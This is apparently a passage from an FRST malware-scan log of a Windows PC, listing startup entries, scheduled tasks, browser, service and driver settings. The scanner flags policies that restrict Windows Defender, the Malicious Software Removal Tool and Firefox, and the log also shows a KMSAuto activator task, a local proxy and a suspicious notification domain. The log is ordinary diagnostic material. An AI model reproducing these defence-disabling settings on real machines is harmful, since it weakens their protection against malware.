HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11262019134949250\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.à r.l.)
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-26]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-25]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [No File]
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.p...tiateActivation[X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 HidGuardian; C:\Windows\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX™)
R3 L1C; C:\Windows\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [216544 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-11-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [278344 2019-11-26] (Malwarebytes Inc -> Malwarebytes)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\Windows\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
